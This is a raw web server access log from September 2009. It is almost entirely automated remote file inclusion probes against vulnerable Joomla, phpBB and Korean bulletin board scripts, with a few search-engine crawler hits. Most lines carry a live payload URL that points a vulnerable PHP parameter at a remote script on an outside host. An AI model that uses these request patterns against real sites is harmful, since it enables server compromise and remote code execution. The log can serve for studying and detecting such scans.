64.6.232.171 - - [23/Sep/2009:19:00:12 -0500] "GET /?sourcedir=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
64.6.232.171 - - [23/Sep/2009:19:00:13 -0500] "GET /logs/?sourcedir=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 200 206236 "-""libwww-perl/5.805"
64.6.232.171 - - [23/Sep/2009:19:00:16 -0500] "GET /?sourcedir=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
64.6.232.171 - - [23/Sep/2009:19:00:17 -0500] "GET /logs/?sourcedir=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 200 206236 "-""libwww-perl/5.805"
210.114.220.160 - - [23/Sep/2009:19:03:59 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:03:59 -0500] "GET /?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:04:01 -0500] "GET /logs/?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 200 206236 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:04:24 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:06:24 -0500] "GET /?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:06:24 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:06:24 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.114.220.160 - - [23/Sep/2009:19:06:26 -0500] "GET /logs/?sourcedir=http://www.forester66.com/components/idxx.txt??? HTTP/1.1" 200 206236 "-""Mozilla/5.0"
219.93.2.80 - - [23/Sep/2009:19:07:09 -0500] "GET /logs/access_log.1248480000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
219.93.2.80 - - [23/Sep/2009:19:07:23 -0500] "GET /logs/access_log.1248652800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
200.117.246.27 - - [23/Sep/2009:19:07:31 -0500] "GET /logs/inurl:%22com_pccookbook%22?? HTTP/1.1" 404 310 "-""libwww-perl/5.820"
200.117.246.27 - - [23/Sep/2009:19:07:31 -0500] "GET /inurl:%22com_pccookbook%22?? HTTP/1.1" 404 305 "-""libwww-perl/5.820"
61.100.5.136 - - [23/Sep/2009:19:07:34 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:07:34 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:07:34 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:07:56 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:07:56 -0500] "GET /logs/access_log.1251504000//admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:07:56 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:07:57 -0500] "GET /logs/access_log.1251504000//admin/classes/TplLoad.php?full_path_to_public_program=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:12:34 -0500] "GET /logs/access_log.1250726400/include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:12:34 -0500] "GET /logs/include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:12:34 -0500] "GET /include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:12:42 -0500] "GET /logs/access_log.1245715200/include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.207.75 - - [23/Sep/2009:19:13:29 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.155.5.84 - - [23/Sep/2009:19:17:19 -0500] "GET /logs/include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:17:19 -0500] "GET /include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:17:19 -0500] "GET /logs/access_log.1250726400/include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:19:17:30 -0500] "GET /logs/access_log.1245715200/include.php?phpbb_root_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:18:31 -0500] "GET //skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:18:31 -0500] "GET /logs//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:18:31 -0500] "GET /logs/access_log.1251331200//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:18:33 -0500] "GET /logs//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:18:34 -0500] "GET /logs/access_log.1251504000//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:18:34 -0500] "GET //skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.39.130.23 - - [23/Sep/2009:19:18:42 -0500] "GET //skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.39.130.23 - - [23/Sep/2009:19:18:43 -0500] "GET /logs//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.39.130.23 - - [23/Sep/2009:19:18:43 -0500] "GET /logs/access_log.1251504000//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.51.111 - - [23/Sep/2009:19:19:02 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.64.216.6 - - [23/Sep/2009:19:19:04 -0500] "GET /logs/access_log.1251331200//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.39.130.23 - - [23/Sep/2009:19:19:23 -0500] "GET //skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.39.130.23 - - [23/Sep/2009:19:19:24 -0500] "GET /logs//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.39.130.23 - - [23/Sep/2009:19:19:24 -0500] "GET /logs/access_log.1251331200//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.51.111 - - [23/Sep/2009:19:19:44 -0500] "GET /logs/access_log.1148601600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.42 - - [23/Sep/2009:19:20:09 -0500] "GET /logs/access_log.1183420800 HTTP/1.1" 200 4649 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.39.130.23 - - [23/Sep/2009:19:20:48 -0500] "GET /logs/access_log.1251504000//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.207.172.166 - - [23/Sep/2009:19:22:05 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.207.172.166 - - [23/Sep/2009:19:22:05 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.207.172.166 - - [23/Sep/2009:19:22:05 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.207.172.166 - - [23/Sep/2009:19:22:08 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:22:46 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:22:46 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:22:47 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:22:53 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.207.93 - - [23/Sep/2009:19:22:59 -0500] "GET /logs/access_log.1134000000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.133.40.130 - - [23/Sep/2009:19:23:10 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:10 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:12 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:16 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:16 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:16 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:23:20 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:23:20 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:23:20 -0500] "GET /logs/access_log.1237507200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:21 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:23:22 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:24:33 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:24:33 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:24:34 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:24:37 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:25:03 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:25:05 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:25:06 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:25:11 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.207.29 - - [23/Sep/2009:19:26:31 -0500] "GET /logs/access_log.1213574400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.133.40.130 - - [23/Sep/2009:19:26:46 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:26:46 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:26:47 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:26:49 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.163.202.98 - - [23/Sep/2009:19:27:20 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
66.163.202.98 - - [23/Sep/2009:19:27:20 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
220.133.40.130 - - [23/Sep/2009:19:29:03 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:29:05 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:29:05 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.133.40.130 - - [23/Sep/2009:19:29:06 -0500] "GET /logs/access_log.1235001600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:29:12 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:29:12 -0500] "GET /logs/access_log.1240099200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:29:12 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.105.4.228 - - [23/Sep/2009:19:29:59 -0500] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=?? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
78.105.4.228 - - [23/Sep/2009:19:30:01 -0500] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
92.50.143.90 - - [23/Sep/2009:19:30:23 -0500] "GET /logs/access_log.1239753600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:30:54 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:30:54 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:30:54 -0500] "GET /logs/access_log.1236470400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:03 -0500] "GET /logs/access_log.1248998400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:16 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:16 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:16 -0500] "GET /logs/access_log.1250121600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:25 -0500] "GET /logs/access_log.1237507200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:31:38 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:31:38 -0500] "GET /logs/access_log.1250380800//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:31:38 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:31:45 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:31:45 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:31:45 -0500] "GET /logs/access_log.1250380800//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:45 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:45 -0500] "GET /logs/access_log.1237939200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:31:45 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.107.179 - - [23/Sep/2009:19:32:00 -0500] "GET /logs/access_log.1178668800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.100.5.136 - - [23/Sep/2009:19:32:05 -0500] "GET /logs/access_log.1249862400//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:32:45 -0500] "GET /logs/access_log.1249862400//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.207.75 - - [23/Sep/2009:19:32:59 -0500] "GET /logs/access_log.1193529600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.50.143.90 - - [23/Sep/2009:19:33:12 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:33:12 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:33:12 -0500] "GET /logs/access_log.1237507200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:19:33:20 -0500] "GET /logs/access_log.1240099200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:33:33 -0500] "GET /logs/access_log.1252540800//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:19:33:45 -0500] "GET /logs/access_log.1252540800//admin/business_inc/saveserver.php?thisdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.186.87 - - [23/Sep/2009:19:34:21 -0500] "GET /logs//skin//bbs/ggambo7002_board/bbs/print_category.php?setup[use_category]=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.100.186.87 - - [23/Sep/2009:19:34:21 -0500] "GET /logs/access_log.1246752000//skin//bbs/ggambo7002_board/bbs/print_category.php?setup[use_category]=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.100.186.87 - - [23/Sep/2009:19:34:21 -0500] "GET //skin//bbs/ggambo7002_board/bbs/print_category.php?setup[use_category]=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:34:28 -0500] "GET /logs/access_log.1240531200//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:34:28 -0500] "GET /logs//skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.64.216.6 - - [23/Sep/2009:19:34:28 -0500] "GET //skin/sirini_ezset_fullpack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
